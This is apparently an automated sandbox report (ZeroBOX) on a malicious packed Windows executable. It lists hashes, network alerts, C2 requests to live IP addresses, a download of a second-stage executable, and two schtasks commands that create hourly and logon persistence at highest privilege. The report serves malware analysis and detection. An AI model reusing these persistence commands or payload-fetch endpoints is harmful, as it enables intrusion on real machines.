popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Services.exe

Malicious Library UPX PE32 PE64 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 30, 2023, 12:52 p.m. Sept. 30, 2023, 12:54 p.m.
Size 4.0MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 b9a096baebdf8e44368e9724da8e56dd
SHA256 2157d146a890d32c5ba49f31fa1840e5b0d56e4dd0bbf5f8b14cc4e482a47bef
CRC32 DCE92476
ssdeep 98304:OJhDwVgp97vYIP8nq5g88RzpufFdx37e5vQCxt2xWwESu:OYVgLs1qlYp0Ff37exTjJ
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
telegram.org
A 149.154.167.99
149.154.167.99
dzen.ru
A 62.217.160.2
62.217.160.2
yandex.ru
A 5.255.255.77
A 77.88.55.88
A 77.88.55.60
A 5.255.255.70
77.88.55.88
twitter.com
A 104.244.42.129
104.244.42.193
ipinfo.io
A 34.117.59.81
34.117.59.81
sso.passport.yandex.ru
A 213.180.204.24
CNAME passport.yandex.ru
213.180.204.24
db-ip.com
A 104.26.5.15
A 104.26.4.15
A 172.67.75.166
104.26.4.15
www.maxmind.com
A 104.18.145.235
A 104.18.146.235
104.18.146.235
api.db-ip.com
A 104.26.5.15
A 104.26.4.15
A 172.67.75.166
172.67.75.166
IP Address Status Action
104.18.146.235 Active Moloch
104.244.42.129 Active Moloch
104.26.5.15 Active Moloch
149.154.167.99 Active Moloch
164.124.101.2 Active Moloch
171.22.28.226 Active Moloch
172.67.75.166 Active Moloch
193.42.32.118 Active Moloch
213.180.204.24 Active Moloch
34.117.59.81 Active Moloch
5.255.255.70 Active Moloch
62.217.160.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49168 -> 213.180.204.24:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 62.217.160.2:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49161 -> 149.154.167.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 149.154.167.99:443 -> 192.168.56.103:49163 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 104.26.5.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49173 -> 172.67.75.166:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49164 -> 104.244.42.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 5.255.255.70:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49169 -> 193.42.32.118:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 171.22.28.226:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 171.22.28.226:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 171.22.28.226:80 -> 192.168.56.103:49175 2014819 ET INFO Packed Executable Download Misc activity
TCP 171.22.28.226:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 171.22.28.226:80 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49167
62.217.160.2:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru 6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2
TLSv1
192.168.56.103:49168
213.180.204.24:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru 3a:82:43:a9:43:9c:c8:90:01:04:4f:74:1b:6c:cd:4b:9b:19:7d:93
TLSv1
192.168.56.103:49172
104.26.5.15:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1
192.168.56.103:49173
172.67.75.166:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1
192.168.56.103:49166
5.255.255.70:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "PowerControl HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "PowerControl LG" has successfully been created.
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .vmp#0
section .vmp#1
section .vmp#2
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x7464281e
WinHttpCloseHandle-0x30d winhttp+0x28f4 @ 0x746428f4
WinHttpCloseHandle+0x53 WinHttpSetOption-0x1318 winhttp+0x2c54 @ 0x74642c54
services+0x2ebe5 @ 0x87ebe5
services+0x578e @ 0x85578e
services+0x5739 @ 0x855739
services+0x699a @ 0x85699a
services+0xe696 @ 0x85e696
services+0x38373 @ 0x888373
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x74642753
registers.esp: 4250576
registers.edi: 132
registers.eax: 4250604
registers.ebp: 4250620
registers.edx: 4251780
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

 stacktrace: 
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x7464281e
WinHttpCloseHandle+0x79 WinHttpSetOption-0x12f2 winhttp+0x2c7a @ 0x74642c7a
services+0x2ebe5 @ 0x87ebe5
services+0x578e @ 0x85578e
services+0x5739 @ 0x855739
services+0x699a @ 0x85699a
services+0xe696 @ 0x85e696
services+0x38373 @ 0x888373
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x74642753
registers.esp: 4251680
registers.edi: 132
registers.eax: 4251708
registers.ebp: 4251724
registers.edx: 0
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.42.32.118/api/tracemap.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://193.42.32.118/api/firecom.php
suspicious_features Connection to IP address suspicious_request HEAD http://171.22.28.226/download/WWW14_64.exe
suspicious_features Connection to IP address suspicious_request GET http://171.22.28.226/download/WWW14_64.exe
request GET http://193.42.32.118/api/tracemap.php
request POST http://193.42.32.118/api/firecom.php
request GET http://www.maxmind.com/geoip/v2.1/city/me
request HEAD http://171.22.28.226/download/WWW14_64.exe
request GET http://171.22.28.226/download/WWW14_64.exe
request GET https://yandex.ru/
request GET https://dzen.ru/?yredirect=true
request GET https://sso.passport.yandex.ru/push?uuid=ad269c5f-9769-4a8d-84e7-2d5be64d35f7&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue
request GET https://db-ip.com/
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
request POST http://193.42.32.118/api/firecom.php
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077708280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077709280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007770a280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007770b280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007770c280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007770d280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007770e280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007770f280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077710280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077711280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077712280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077713280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077714280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077715280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077716280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077717280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077718280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077719280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771a280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771b280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771c280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771d280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771e280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007771f280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077720280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077721280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077722280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077723280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077724280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077725280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077726280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077727280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077728280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077729280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772a280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772b280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772c280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772d280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772e280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007772f280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077730280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077731280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077732280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077733280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077734280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077735280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077736280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077737280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077738280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

 process_identifier: 2484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077739280
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0
domain ipinfo.io
file C:\Users\test22\Documents\WplnwTvomfs_ETjSFxp7elDm.exe
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
file C:\Users\test22\Documents\WplnwTvomfs_ETjSFxp7elDm.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2524
thread_handle: 0x00000560
process_identifier: 2520
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000568
1 1 0

CreateProcessInternalW

 thread_identifier: 2600
thread_handle: 0x000005e8
process_identifier: 2596
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000005d8
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†LËeð" ø0æ,Ǟ@»<h`€€˜¡´à¦, LHƒÐ¤Pzí(€è …÷0 ` vÁ1@@ $à4@À ÈW6@@ üp7@@.vmp#0R{€7@@ T&:@@.idata0:@À.tls@:À.themida`;P:`à.vmp#1¢Ï'°u `.vmp#2€@À.vmp#3è?f@f `h.reloc¤ÐLf@.rsrc¦,à.Nf@@óŸÔƒíÖÞ¡lû³J¦žäNžÄópP²,?±´Ð³ð&¡"=´n”íZ[²¢·íRU´ÒÇÀ´"¿®ªøìȕŸž¡Xðž¦!ËÈÙ®Žr±z0Ÿ4 ´oŸ†:±DáÐ7íR®¯Ò+ž–'´¬È¡p5ÇW²2á*󟚢ȸ̞¤Ì°æ¡‚ŽíX\͞âÌ&Y­S®ÜT®Ö²è̌m°7ŸæÍí˜òÆfB®° Èº¯JÝ LT­–Žížª®¨ÌžFA­¦¿ÇBN­Œ“´@Ù͆´ðz¡þZ±ÒKǂ"ȤȮçÍXu°Æ˜´BœŸø:±ØØ ò™ŸÖ‹±Ñ®š±¶ª®X²¡8Ύݳ m àŸh»ÌDIˬ%®Ø‚Í"ížé ÒĝÞ|Èâÿ³,k±t'´|Н>'ËrðžJ¡$TŸøJ®埼v±ÒkË0ÏËø|Ȍ ÈÆ¥¯L> ÀF®
request_handle: 0x00cc000c
